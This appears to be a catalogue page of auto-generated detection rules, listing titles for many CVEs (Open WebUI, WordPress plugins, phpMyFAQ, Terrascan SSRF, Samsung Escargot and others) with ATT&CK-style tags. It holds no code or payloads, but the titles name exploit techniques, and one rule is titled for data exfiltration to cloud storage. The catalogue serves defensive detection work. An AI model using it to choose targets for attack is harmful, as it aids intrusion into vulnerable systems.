Auto-generated from NVIDIA Triton Inference Server: Critical Authentication B...
🛡️ 2 more rules via /detect
NVIDIA Triton Inference Server Auth Bypass Attempt - Free Tier
🌐 NVDT1190 — Initial Access
Auto-generated from NVIDIA Triton Inference Server: Critical Auth Bypass Puts...
🛡️ 2 more rules via /detect
CVE-2026-24163 - TRT-LLM Unsafe Deserialization via RPC Testing
🌐 NVDT1190 — Initial Access
Auto-generated from NVIDIA TRT-LLM Vulnerability: Unsafe Deserialization Lead...
🛡️ 2 more rules via /detect
CVE-2025-33255 - Unsafe Deserialization in NVIDIA TRT-LLM MPI Server
🌐 NVDT1505.003 — Persistence
Auto-generated from NVIDIA TRT-LLM Vulnerability Exposes AI Workloads to RCE
🛡️ 2 more rules via /detect
WordPress Read More & Accordion Plugin Privilege Escalation - CVE-2026-7467
🌐 NVDT1078.001 — Persistence
Auto-generated from WordPress Read More & Accordion Plugin: Privilege Escalat...
🛡️ 2 more rules via /detect
CVE-2026-7284: WordPress Elementor Privilege Escalation via User Registration
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-7284: Critical WordPress Elementor Plugin Privil...
🛡️ 1 more rules via /detect
CVE-2026-6555: ProSolution WP Client Arbitrary File Upload
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-6555: ProSolution WP Client Arbitrary File Uploa...
🛡️ 2 more rules via /detect
WordPress Account Switcher Plugin Privilege Escalation via REST API - CVE-2026-6456
🌐 NVDT1068 — Privilege Escalation
Auto-generated from WordPress Account Switcher Plugin: Critical Privilege Esc...
🛡️ 2 more rules via /detect
Rsync Integer Overflow - Rsync Daemon Network Connection - CVE-2026-43618
🌐 NVDT1190 — Initial Access
Auto-generated from Rsync CVE-2026-43618: Integer Overflow Exposes Memory, By...
🛡️ 2 more rules via /detect
CVE-2026-3985 - Creative Mail Plugin SQL Injection via checkout_uuid
🌐 NVDT1190 — Initial Access
Auto-generated from Creative Mail WordPress Plugin SQLi Exposes User Data
🛡️ 2 more rules via /detect
CtrlPanel Unauthenticated Admin Write Access - CVE-2026-34358
🌐 NVDT1078.002 — Privilege Escalation
Auto-generated from CtrlPanel Privilege Escalation (CVE-2026-34358) Allows Fu...
🛡️ 2 more rules via /detect
CVE-2026-34241: CtrlPanel Stored XSS in Ticket Reply Notifications
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-34241: CtrlPanel XSS Allows Admin Session Hijack
🛡️ 2 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-34234
🌐 NVDT1190 — Initial Access
Auto-generated from CtrlPanel RCE: Critical Flaw in Hosting Billing Software ...
🛡️ 2 more rules via /detect
CVE-2026-32882 - Libheif Heap Buffer Over-Read in PixelImage::overlay
🌐 NVDT1204.002 — Execution
Auto-generated from Libheif Heap Buffer Over-Read Vulnerability (CVE-2026-328...
🛡️ 1 more rules via /detect
Potential libheif Heap Overflow Exploit Attempt (CVE-2026-32741)
🌐 NVDT1190 — Initial Access
Auto-generated from libheif Heap Overflow (CVE-2026-32741) Risks HEIF/AVIF De...
🛡️ 2 more rules via /detect
CVE-2026-32740 - libheif Heap-Buffer-Overflow via Crafted HEIF/AVIF File
🌐 NVDT1566.002 — Initial Access
Auto-generated from libheif Heap-Buffer-Overflow (CVE-2026-32740) Exposes Ima...
🛡️ 2 more rules via /detect
WordPress Kirki Plugin Arbitrary File Deletion - downloadZIP Function - CVE-2026-8073
🌐 NVDT1190 — Initial Access
Auto-generated from WordPress Kirki Plugin Vulnerable to Arbitrary File Deletion
🛡️ 2 more rules via /detect
CVE-2026-33642 - Kitty Terminal Heap Over-Read/Write via Crafted Escape Sequences
🌐 NVDT1190 — Initial Access
Auto-generated from Kitty Terminal Heap Over-Read/Write Vulnerability (CVE-20...
🛡️ 2 more rules via /detect
CVE-2026-47107: Windmill nsjail Sandbox Write to /etc/hosts
🌐 NVDT1574.002 — Persistence
Auto-generated from CVE-2026-47107: Windmill Sandbox Vulnerability Exposes Ad...
🛡️ 3 more rules via /detect
Kitty Terminal Heap Buffer Overflow DoS (CVE-2026-33633)
🌐 NVDT1190 — Initial Access
Auto-generated from Kitty Terminal Heap Buffer Overflow (CVE-2026-33633) — Do...
🛡️ 2 more rules via /detect
CVE-2026-47358: Terrascan Server Mode SSRF Local File Read via ARM Template
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-47358: Terrascan SSRF Allows Local File Read in ...
🛡️ 2 more rules via /detect
CVE-2026-47357: Terrascan SSRF Remote Directory Scan with file:// URL
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-47357: Terrascan SSRF Exposes Local Files, Crede...
🛡️ 2 more rules via /detect
CVE-2026-47356: Terrascan SSRF via webhook_url
🌐 NVDT1190 — Initial Access
Auto-generated from Terrascan SSRF Vulnerability (CVE-2026-47356) Exposes Sca...
🛡️ 2 more rules via /detect
CVE-2026-5804 - Motorola Factory Test Component TCP Server Exposure
🌐 NVDT1219 — Defense Evasion
Auto-generated from Motorola Factory Test Component Exposes Sensitive Device ...
🛡️ 2 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-8711
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-8711: NGINX JavaScript Heap Overflow Risks Code ...
🛡️ 2 more rules via /detect
CVE-2026-8912: WordPress Contest Gallery Plugin SQLi via form_input
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-8912: WordPress Contest Gallery Plugin SQLi
🛡️ 2 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-7507
🌐 NVDT1190 — Initial Access
Auto-generated from Keycloak Session Fixation Flaw Allows Account Takeover (C...
🛡️ 3 more rules via /detect
Keycloak SAML Endpoint DoS Attempt - CVE-2026-7307
🌐 NVDT1499 — Impact
Auto-generated from Keycloak DoS Vulnerability (CVE-2026-7307) Exposes SAML E...
CVE-2026-2611: MLflow Assistant RCE via Origin Bypass
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-2611: MLflow Assistant Critical RCE via Origin V...
🛡️ 2 more rules via /detect
CVE-2026-4885: Piotnet Addons for Elementor Pro Arbitrary File Upload (.phar, .phtml)
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-4885: Piotnet Addons for Elementor Pro RCE via F...
🛡️ 2 more rules via /detect
CVE-2026-47314 - Samsung Escargot Out-of-Bounds Write
🌐 NVDT1190 — Initial Access
Auto-generated from Samsung Escargot Out-of-Bounds Write Poses High Risk
🛡️ 1 more rules via /detect
CVE-2026-8813: ExifReader DoS via Crafted ICC mluc Tags in Image Upload
🌐 NVDT1499 — Impact
Auto-generated from CVE-2026-8813: ExifReader DoS Via Crafted ICC mluc Tags
🛡️ 2 more rules via /detect
CVE-2026-47311 - Samsung Escargot Heap Overflow Attempt
🌐 NVDT1190 — Initial Access
Auto-generated from Samsung Escargot Heap Overflow (CVE-2026-47311) Poses Hig...
🛡️ 2 more rules via /detect
CVE-2026-47310 - Samsung Escargot Use-After-Free Attempt
🌐 NVDT1190 — Initial Access
Auto-generated from Samsung Open Source Escargot Vulnerability: Use-After-Fre...
🛡️ 2 more rules via /detect
CVE-2026-33233 - AutoGPT Insecure Deserialization via Redis Pickle
🌐 NVDT1505.003 — Persistence
Auto-generated from AutoGPT Insecure Deserialization (CVE-2026-33233) Leads t...
🛡️ 1 more rules via /detect
CVE-2026-33232: AutoGPT Uncontrolled Disk Space Consumption via download_agent_file
🌐 NVDT1499.001 — Impact
Auto-generated from AutoGPT DoS: Unauthenticated Attack Exhausts Disk Space
🛡️ 2 more rules via /detect
CVE-2026-32323 - Mullvad VPN Installer Privilege Escalation via Crafted Bundle
🌐 NVDT1547.001 — Privilege Escalation
Auto-generated from Mullvad VPN macOS Installer Flaw Allows Root Code Execution
🛡️ 2 more rules via /detect
CVE-2026-30950 - AutoGPT Authenticated Session Hijacking via IDOR
🌐 NVDT1078.004 — Persistence
Auto-generated from AutoGPT Authenticated Session Hijacking via IDOR (CVE-202...
🛡️ 1 more rules via /detect
FacturaScripts CVE-2026-27891: Zip Slip Arbitrary File Write to PHP
🌐 NVDT1190 — Initial Access
Auto-generated from FacturaScripts CVE-2026-27891: Critical Zip Slip Leads to...
🛡️ 2 more rules via /detect
CVE-2026-8851: SOGo ACL SQL Injection via uid parameter
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-8851: SOGo SQL Injection Exposes Database Data
🛡️ 2 more rules via /detect
CVE-2026-8838: RCE via amazon-redshift-python-driver eval() abuse
🌐 NVDT1059.006 — Execution
Auto-generated from CVE-2026-8838: Critical RCE in amazon-redshift-python-driver
🛡️ 2 more rules via /detect
CVE-2026-4137: MLflow Temporary Directory World-Writable Permissions
🌐 NVDT1578.002 — Defense Evasion
Auto-generated from CVE-2026-4137: MLflow Temporary Files Vulnerability Expos...
🛡️ 2 more rules via /detect
CVE-2026-27130 - Dokploy OS Command Injection via appName
🌐 NVDT1190 — Initial Access
Auto-generated from Dokploy PaaS: Critical OS Command Injection CVE-2026-27130
🛡️ 2 more rules via /detect
CVE-2026-25244: WebdriverIO Malicious Git Branch Name Command Injection
🌐 NVDT1059.004 — Execution
Auto-generated from CVE-2026-25244: WebdriverIO RCE via Malicious Git Branch ...
🛡️ 2 more rules via /detect
Joplin Path Traversal - Arbitrary File Overwrite Attempt (CVE-2026-22810)
🌐 NVDT1505.003 — Persistence
Auto-generated from Joplin Path Traversal (CVE-2026-22810) Allows Arbitrary F...
🛡️ 2 more rules via /detect
CVE-2026-47092: Claude HUD COMSPEC Manipulation for Local Code Execution
🌐 NVDT1574.002 — Persistence
Auto-generated from CVE-2026-47092: Claude HUD Vulnerability Allows Local Cod...
🛡️ 2 more rules via /detect
CVE-2026-45245: Authenticated Daemon Request via Synthetic Mouseover
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-45245: Hover Summary Feature Exposes Authenticat...
🛡️ 2 more rules via /detect
CVE-2026-8836: lwIP SNMPv3 USM Handler Stack Buffer Overflow
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-8836: Critical lwIP Stack Buffer Overflow in SNM...
CVE-2026-45230: DumbAssets Arbitrary File Deletion via Path Traversal
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-45230: Critical Path Traversal in DumbAssets All...
🛡️ 2 more rules via /detect
Azure Local Disconnected Operations Privilege Escalation Attempt (CVE-2026-42822)
🌐 NVDT1190 — Initial Access
Auto-generated from Azure Local Disconnected Operations Critical Privilege Es...
🛡️ 2 more rules via /detect
Dify Path Traversal to Internal API Access (CVE-2026-41948) - Free Tier
🌐 NVDT1190 — Initial Access
Auto-generated from Dify Path Traversal (CVE-2026-41948) Allows Internal API ...
🛡️ 2 more rules via /detect
Dify Authorization Bypass - Trace Configuration Update - CVE-2026-41947
🌐 NVDT1190 — Initial Access
Auto-generated from Dify Authorization Bypass (CVE-2026-41947) Exposes LLM Tr...
🛡️ 2 more rules via /detect
CVE-2026-7498: Basamak DernekWeb Stored XSS - Suspicious Script Injection
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-7498: Basamak DernekWeb Stored XSS Poses High Risk
🛡️ 2 more rules via /detect
Data Exfiltration to Cloud Storage
🌐 NVDT1537 — Exfiltration
Auto-generated from Mattermost CVE-2026-6346: Support Packets Leak Sensitive ...
CVE-2026-8785: SQL Injection in Hospital Management System update_info.php
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-8785: SQL Injection in projectworlds hospital-ma...
🛡️ 2 more rules via /detect
CVE-2026-8771: SQL Injection in litemall WeChat API Goods Controller
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-8771: High-Severity SQL Injection in linlinjava ...
🛡️ 2 more rules via /detect
Vercel AI SSRF via download-blob.ts - CVE-2026-8768
🌐 NVDT1190 — Initial Access
Auto-generated from Vercel AI SSRF (CVE-2026-8768) Poses Remote Threat
🛡️ 2 more rules via /detect
CVE-2026-8764 H3C Magic B3 UpdateWanParams Buffer Overflow
🌐 NVDT1190 — Initial Access
Auto-generated from H3C Magic B3 Vulnerability (CVE-2026-8764) Exposes Router...
🛡️ 1 more rules via /detect
CVE-2026-8759: Beetl SpEL Injection via SpELFunction.java
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-8759: xiandafu beetl SpEL Injection Vulnerability
🛡️ 1 more rules via /detect
CVE-2026-8758: Metasoft MetaCRM Unrestricted File Upload via upload3.jsp
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-8758: Metasoft MetaCRM Unrestricted File Upload ...
🛡️ 2 more rules via /detect
CVE-2026-8757: adenhq hive Path Traversal in Delete Request Handler
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-8757: adenhq hive Path Traversal Vulnerability P...
🛡️ 2 more rules via /detect
CVE-2026-8756: Bert-VITS2 Path Traversal in Gradio Interface
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-8756: fishaudio Bert-VITS2 Path Traversal Vulner...
🛡️ 2 more rules via /detect
CVE-2026-8755: Bert-VITS2 Path Traversal in Model Handler
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-8755: fishaudio Bert-VITS2 Path Traversal Vulner...
🛡️ 2 more rules via /detect
CVE-2018-25339 - Zechat 1.5 SQL Injection via 'v' parameter
🌐 NVDT1190 — Initial Access
Auto-generated from Zechat 1.5 SQL Injection Allows Unauthenticated Database ...
🛡️ 2 more rules via /detect
CVE-2018-25338: Zechat SQLi in hashtag parameter
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2018-25338: Zechat SQLi Allows Unauthenticated Databa...
🛡️ 2 more rules via /detect
CVE-2018-25335 - Peugeot Music Plugin Arbitrary File Upload
🌐 NVDT1190 — Initial Access
Auto-generated from WordPress Plugin Peugeot Music 1.0 Critical Arbitrary Fil...
🛡️ 2 more rules via /detect
CVE-2018-25333: Nordex Wind Turbine Unauthenticated SQL Injection via login.php
🌐 NVDT1190 — Initial Access
Auto-generated from Nordex N149/4.0-4.5 Wind Turbine Web Server Vulnerability...
🛡️ 2 more rules via /detect
CVE-2018-25332: GitBucket Unauthenticated RCE via Git LFS Upload
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2018-25332: GitBucket RCE Exposes Unauthenticated Com...
🛡️ 2 more rules via /detect
Joomla EkRishta SQL Injection via phone_no parameter - CVE-2018-25330
🌐 NVDT1190 — Initial Access
Auto-generated from Joomla! EkRishta XSS and SQLi Flaws Pose High Risk (CVE-2...
🛡️ 1 more rules via /detect
CVE-2018-25329 - WordPress WP Spritz RFI Arbitrary File Read
🌐 NVDT1190 — Initial Access
Auto-generated from WordPress Plugin WP with Spritz RFI Allows Arbitrary File...
🛡️ 1 more rules via /detect
CVE-2018-25328: VX Search Directory Buffer Overflow
🌐 NVDT1218 — Execution
Auto-generated from CVE-2018-25328: VX Search Buffer Overflow Allows Code Exe...
🛡️ 2 more rules via /detect
CVE-2018-25326 - Google Drive for WordPress Unauthenticated File Read
🌐 NVDT1190 — Initial Access
Auto-generated from Google Drive for WordPress Path Traversal Allows Unauthen...
🛡️ 1 more rules via /detect
Exploitation Attempt — CVE-2018-25325
🌐 NVDvulnerability — event-type
Auto-generated from WooCommerce CSV Importer Path Traversal Allows Arbitrary ...
CVE-2018-25323 - Allok AVI DivX MPEG Converter SEH Buffer Overflow via License Name Field
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2018-25323: Allok AVI DivX MPEG Converter SEH Buffer ...
🛡️ 2 more rules via /detect
Suspicious PowerShell Execution
🌐 NVDT1059.001 — Execution
Auto-generated from CVE-2018-25322: Allok Fast AVI MPEG Splitter Stack Buffer...
🛡️ 1 more rules via /detect
CVE-2018-25320 - ACL Analytics EXECUTE Function RCE via bitsadmin
🌐 NVDT1190 — Initial Access
Auto-generated from ACL Analytics RCE: Critical Arbitrary Code Execution via ...
🛡️ 2 more rules via /detect
CVE-2026-8751: h2oai h2o-3 Insecure Deserialization via importBinaryModel
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-8751: h2oai h2o-3 Insecure Deserialization Vulne...
🛡️ 2 more rules via /detect
CVE-2026-8734 - Oinone Pamirs SQL Injection via queryListByWrapper
🌐 NVDT1190 — Initial Access
Auto-generated from Oinone Pamirs SQL Injection (CVE-2026-8734) Poses Remote ...
🛡️ 2 more rules via /detect
CVE-2026-8719: WordPress AI Engine Plugin Unauthorized Admin Access via OAuth
🌐 NVDT1068 — Privilege Escalation
Auto-generated from CVE-2026-8719: WordPress AI Engine Plugin Privilege Escal...
🛡️ 1 more rules via /detect
CVE-2026-8725: CoreWorxLab CAAL SSRF via test-hass Endpoint
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-8725: CoreWorxLab CAAL SSRF Vulnerability Public...
🛡️ 2 more rules via /detect
CVE-2026-46728: U-Boot FIT Signature Bypass Attempt
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-46728: Das U-Boot Signature Bypass Flaw
🛡️ 2 more rules via /detect
Web Application Exploitation Attempt — CVE-2021-47979
🌐 NVDT1190 — Initial Access
Auto-generated from WordPress Plugin Backup and Restore: Arbitrary File Delet...
🛡️ 2 more rules via /detect
CVE-2021-47976 - TextPattern CMS Arbitrary PHP File Upload
🌐 NVDT1190 — Initial Access
Auto-generated from TextPattern CMS RCE via Plugin Upload (CVE-2021-47976)
🛡️ 2 more rules via /detect
CVE-2021-47956 - EgavilanMedia PHPCRUD Unauthenticated SQL Injection via firstname
🌐 NVDT1190 — Initial Access
Auto-generated from EgavilanMedia PHPCRUD SQLi Exposes Unauthenticated Data A...
🛡️ 2 more rules via /detect
CVE-2021-47954: Unauthenticated SQLi in LayerBB search.php
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2021-47954: Unauthenticated SQLi in LayerBB 1.1.4
🛡️ 2 more rules via /detect
CVE-2021-47952 - jsonpickle Malicious JSON Payload Deserialization
🌐 NVDT1505.003 — Initial Access
Auto-generated from python jsonpickle RCE (CVE-2021-47952) Exploits Malicious...
🛡️ 2 more rules via /detect
CVE-2020-37244: Supsystic Membership SQL Injection via Search/Sidx Parameters
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2020-37244: Supsystic Membership SQLi Puts User Data ...
🛡️ 2 more rules via /detect
CVE-2020-37243 - Supsystic Pricing Table SQLi via sidx parameter
🌐 NVDT1190 — Initial Access
Auto-generated from Supsystic Pricing Table SQLi & XSS: Unauthenticated RCE Risk
🛡️ 2 more rules via /detect
CVE-2020-37242 - Supsystic Ultimate Maps SQLi via sidx parameter
🌐 NVDT1190 — Initial Access
Auto-generated from Supsystic Ultimate Maps SQLi: Unauthenticated RCE Risk
🛡️ 2 more rules via /detect
CVE-2020-37239: libbabl Double Free Attempt
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2020-37239: libbabl Double Free Bypasses Memory Safety
🛡️ 2 more rules via /detect
CVE-2020-37232 - Unquoted Service Path Privilege Escalation
🌐 NVDT1574.002 — Privilege Escalation
Auto-generated from Advanced SystemCare Service Vulnerability: Local Privileg...
🛡️ 2 more rules via /detect
CVE-2020-37231: Privacy Drive Unquoted Service Path Privilege Escalation
🌐 NVDT1547.002 — Persistence
Auto-generated from Privacy Drive 3.17.0 Unquoted Path Leads to Local Privile...
🛡️ 2 more rules via /detect
CVE-2020-37230 - Syncplify.me Server Unquoted Service Path Privilege Escalation
🌐 NVDT1547.002 — Privilege Escalation
Auto-generated from Syncplify.me Server! CVE-2020-37230: Local Privilege Esca...
🛡️ 2 more rules via /detect
CVE-2020-37229 - OKI sPSV Port Manager Unquoted Service Path Privilege Escalation
🌐 NVDT1574.001 — Privilege Escalation
Auto-generated from OKI sPSV Port Manager: Local Privilege Escalation via Unq...
🛡️ 2 more rules via /detect
CVE-2020-37228: iDS6 DSSPro CAPTCHA Bypass via autoLoginVerifyCode
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2020-37228: iDS6 DSSPro Digital Signage CAPTCHA Bypass
🛡️ 1 more rules via /detect
CVE-2020-37227: HS Brand Logo Slider Unrestricted File Upload to PHP
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2020-37227: HS Brand Logo Slider Unrestricted File Up...
CVE-2026-8657: jsondiffpatch Prototype Pollution via crafted delta
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-8657: jsondiffpatch Prototype Pollution Poses Hi...
🛡️ 2 more rules via /detect
CVE-2026-45665 - Open WebUI Stored XSS in Banner Component
🌐 NVDT1189 — Initial Access
Auto-generated from Open WebUI XSS Allows Privilege Escalation to Super Admin
🛡️ 2 more rules via /detect
CVE-2026-45350: Open WebUI Unauthorized Tool Access via Chat Completion API
🌐 NVDT1204.002 — Execution
Auto-generated from CVE-2026-45350: Open WebUI API Flaw Exposes Tools to Unau...
🛡️ 2 more rules via /detect
CVE-2026-45338: Open WebUI SSRF via OAuth Picture URL
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-45338: Open WebUI SSRF Vulnerability Exposes Int...
🛡️ 2 more rules via /detect
CVE-2026-45315: Open WebUI Polyglot WAV+HTML Upload for XSS
🌐 NVDT1190 — Initial Access
Auto-generated from Open WebUI CVE-2026-45315: Polyglot Upload Enables XSS
🛡️ 2 more rules via /detect
CVE-2026-45303: Open WebUI HTML Rendering Script Injection
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-45303: Open WebUI Vulnerability Allows Script In...
🛡️ 2 more rules via /detect
Open WebUI Unauthorized File Access - CVE-2026-45301
🌐 NVDT1110.001 — Privilege Escalation
Auto-generated from Open WebUI Vulnerability Exposes All User Files
🛡️ 2 more rules via /detect
CVE-2026-44570: Open WebUI Unauthorized Memory Access via API Query
🌐 NVDT1190 — Initial Access
Auto-generated from Open WebUI CVE-2026-44570: Inconsistent Auth Exposes User...
🛡️ 2 more rules via /detect
CVE-2026-44569: Open WebUI IDOR API Call to Modify/Delete Messages
🌐 NVDT1531 — Impact
Auto-generated from CVE-2026-44569: Open WebUI IDOR Exposes Offline AI Messages
🛡️ 2 more rules via /detect
CVE-2026-44567: Open WebUI Unauthorized Role Access
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-44567: Open WebUI API Fails Role Validation, All...
🛡️ 1 more rules via /detect
CVE-2026-44566 - Open WebUI Arbitrary File Upload via Path Traversal
🌐 NVDT1190 — Initial Access
Auto-generated from Open WebUI Vulnerability Allows Arbitrary File Uploads vi...
🛡️ 2 more rules via /detect
CVE-2026-44565 - Open WebUI Arbitrary File Upload via Path Traversal
🌐 NVDT1190 — Initial Access
Auto-generated from Open WebUI Path Traversal (CVE-2026-44565) Allows Arbitra...
🛡️ 2 more rules via /detect
CVE-2026-44549 - Open WebUI XLSX XSS via sheet_to_html
🌐 NVDT1190 — Initial Access
Auto-generated from Open WebUI XSS Vulnerability Exposes Offline AI Platforms
🛡️ 2 more rules via /detect
CVE-2026-8696 - Radare2 Use-After-Free in GDB Client
🌐 NVDT1204.002 — Execution
Auto-generated from radare2 Use-After-Free (CVE-2026-8696) Risks Denial of Se...
🛡️ 1 more rules via /detect
CVE-2026-45675: Open WebUI LDAP/OAuth Admin Race Condition
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-45675: Open WebUI Vulnerable to Admin Role Race ...
🛡️ 1 more rules via /detect
CVE-2026-45671: Open WebUI Unauthenticated File Deletion via Shared Chat Reference
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-45671: Open WebUI File Deletion Flaw Impacts Sel...
🛡️ 2 more rules via /detect
Open WebUI Low-Privilege Task Disruption - CVE-2026-45399
🌐 NVDT1531 — Impact
Auto-generated from Open WebUI CVE-2026-45399: Low-Privilege Users Disrupt Sy...
🛡️ 1 more rules via /detect
Open WebUI API Chat Completion Access - CVE-2026-45349
🌐 NVDT1190 — Initial Access
Auto-generated from Open WebUI Vulnerability Exposes User Chat Conversations
🛡️ 1 more rules via /detect
CVE-2026-45331: Open WebUI IPv6 Bypass in URL Validation
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-45331: Open WebUI Vulnerability Exposes Internal...
🛡️ 2 more rules via /detect
CVE-2026-44556: Open WebUI Unauthenticated Access to /responses Endpoint
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-44556: Open WebUI API Bypasses LLM Access Controls
🛡️ 2 more rules via /detect
CVE-2026-44555: Open WebUI Unauthorized Restricted Model Access
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-44555: Open WebUI Exposes Restricted AI Models
🛡️ 1 more rules via /detect
CVE-2026-44554 - Open WebUI Unauthorized Collection Deletion
🌐 NVDT1190 — Initial Access
Auto-generated from Open WebUI Vulnerability: Unauthorized Collection Deletio...
🛡️ 2 more rules via /detect
Open WebUI Revoked Admin Session Persistence - CVE-2026-44553
🌐 NVDT1134.001 — Privilege Escalation
Auto-generated from Open WebUI Vulnerability: Revoked Admins Retain Access
🛡️ 1 more rules via /detect
CVE-2026-44552 - Open WebUI Redis Key Collision
🌐 NVDT1505.003 — Persistence
Auto-generated from Open WebUI Vulnerability: Redis Key Collision Exposes Mul...
🛡️ 1 more rules via /detect
CVE-2026-44551: Open WebUI LDAP Authentication Bypass via Empty Password
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-44551: Open WebUI LDAP Bypass via Empty Password
🛡️ 1 more rules via /detect
CVE-2026-8686 - coreMQTT v5.0.1 DoS via Crafted MQTT v5.0 Packet
🌐 NVDT1499 — Impact
Auto-generated from coreMQTT CVE-2026-8686: DoS via Crafted MQTT v5.0 Packet
Vvveb CMS Cart Hijacking Attempt (CVE-2026-46408)
🌐 NVDT1190 — Initial Access
Auto-generated from Vvveb CMS Vulnerability (CVE-2026-46408) Allows Cart Hija...
🛡️ 1 more rules via /detect
Vvveb CMS Admin Auth Token Disclosure - CVE-2026-46407
🌐 NVDT1078.002 — Privilege Escalation
Auto-generated from Vvveb CMS API Token Disclosure (CVE-2026-46407) High Seve...
🛡️ 1 more rules via /detect
phpMyFAQ Stored XSS - Malicious URL Comment Injection - CVE-2026-46367
🌐 NVDT1190 — Initial Access
Auto-generated from phpMyFAQ Stored XSS: Authenticated Users Can Steal Admin ...
🛡️ 2 more rules via /detect
CVE-2026-46366 - phpMyFAQ Information Disclosure via Solution ID Enumeration
🌐 NVDT1190 — Initial Access
Auto-generated from phpMyFAQ Information Disclosure (CVE-2026-46366) Exposes ...
🛡️ 2 more rules via /detect
CVE-2026-46364: Unauthenticated SQL Injection via phpMyFAQ API Captcha Endpoint
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-46364: Critical SQL Injection in phpMyFAQ Unauth...
🛡️ 2 more rules via /detect
CVE-2026-46359: phpMyFAQ SQL Injection via OAuth Token Claims
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-46359: phpMyFAQ SQL Injection via OAuth Token Cl...
🛡️ 2 more rules via /detect
CVE-2026-45010: phpMyFAQ Admin 2FA Bypass via Brute-Force
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-45010: phpMyFAQ 2FA Bypass Grants Admin Access
🛡️ 1 more rules via /detect
Vvveb CMS CVE-2026-44826 Negative Quantity Cart Add - Initial Access
🌐 NVDT1190 — Initial Access
Auto-generated from Vvveb CMS CVE-2026-44826 Allows Negative Order Totals, Ex...
🛡️ 1 more rules via /detect
CVE-2021-47966: PHP Timeclock Blind SQLi via login.php
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2021-47966: PHP Timeclock SQLi Exposes Employee Data
🛡️ 2 more rules via /detect
CVE-2021-47965 - WordPress WP Super Edit Unrestricted File Upload
🌐 NVDT1190 — Initial Access
Auto-generated from WordPress Plugin WP Super Edit RCE via Unrestricted File ...
🛡️ 2 more rules via /detect
Schlix CMS Arbitrary PHP Code Upload - CVE-2021-47964
🌐 NVDT1190 — Initial Access
Auto-generated from Schlix CMS RCE (CVE-2021-47964) Exposes Servers to Authen...
🛡️ 2 more rules via /detect
CVE-2021-47963 - Anote Persistent XSS Markdown Injection
🌐 NVDT1190 — Initial Access
Auto-generated from Anote 1.0 RCE via Persistent XSS (CVE-2021-47963)
🛡️ 2 more rules via /detect
CVE-2026-8695: radare2 Use-After-Free in gdbr_threads_list
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-8695: radare2 Use-After-Free Allows Remote Code ...
🛡️ 1 more rules via /detect
CVE-2026-45539 - APM Agent File Disclosure via Symlink
🌐 NVDT1071.004 — Defense Evasion
Auto-generated from Microsoft APM Vulnerability CVE-2026-45539 Exposes AI Age...
🛡️ 2 more rules via /detect
CVE-2026-45037 - Tabby Terminal OS Protocol Handler Hijack via Malicious URI
🌐 NVDT1204.002 — Initial Access
Auto-generated from Tabby Terminal Vulnerability CVE-2026-45037 Allows OS Pro...
🛡️ 2 more rules via /detect
CVE-2026-45036: Tabby Terminal ZMODEM Unconfirmed Protocol Detection
🌐 NVDT1059.004 — Execution
Auto-generated from CVE-2026-45036: Tabby Terminal ZMODEM Flaw Enables Code E...
🛡️ 2 more rules via /detect
CVE-2026-44717: MCP Calculate Server RCE via eval() injection
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-44717: Critical RCE in MCP Calculate Server Due ...
🛡️ 2 more rules via /detect
CVE-2026-44714: bitcoinj Library Arbitrary Spend Attempt
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-44714: bitcoinj Library Flaw Allows Arbitrary P2...
🛡️ 1 more rules via /detect
Exploitation Attempt — CVE-2026-44641
🌐 NVDvulnerability — event-type
Auto-generated from CVE-2026-44641: Microsoft APM Plugin Path Traversal Vulne...
CVE-2026-41258 - OpenMRS Unrestricted Java Reflection via Velocity Template
🌐 NVDT1190 — Initial Access
Auto-generated from OpenMRS RCE: Critical Vulnerability Allows Unrestricted J...
🛡️ 2 more rules via /detect
